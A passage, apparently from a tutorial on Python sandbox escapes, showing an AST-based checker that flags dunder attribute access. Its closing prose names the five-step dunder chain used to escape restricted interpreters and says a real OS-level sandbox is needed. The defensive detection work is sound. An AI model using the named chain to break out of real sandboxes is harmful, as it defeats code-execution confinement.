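            self.findings.append(('attribute', node.attr, node.lineno))
        self.generic_visit(node)

    def visit_Name(self, node):
        if self._is_dunder(node.id):
            self.findings.append(('name', node.id, node.lineno))
        self.generic_visit(node)


def ast_policy_findings(src):
    """Parse src and return each dunder access found; unparsable input is itself a finding."""
    try:
        tree = ast.parse(src)
    except SyntaxError as exc:
        return [('syntax', str(exc), 0)]
    walker = DunderWalker()
    walker.visit(tree)
    return walker.findings


def allowed(src):
    """Policy decision: accept only source with no dunder access at all."""
    return not ast_policy_findings(src)


if __name__ == '__main__':
    for sample in (ESCAPE_CHAIN, BENIGN, FALSE_POSITIVE):
        print(sample)
        print('  blacklist hits:', string_blacklist_hit(sample))
        print('  ast findings:  ', ast_policy_findings(sample))
```

The structural check sees the five dunder hops of the chain (__class__, __base__, __subclasses__, __init__, __globals__) regardless of how the text is spelled or split, while passing 'chaos', which the substring list rejects. Matching on the parse tree is still source filtering, though; the session above is a reminder that removing builtins and banning words does not confine code that already runs inside the interpreter, so an actual sandbox boundary (a separate process with OS-level restrictions) is the control to rely on.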

pass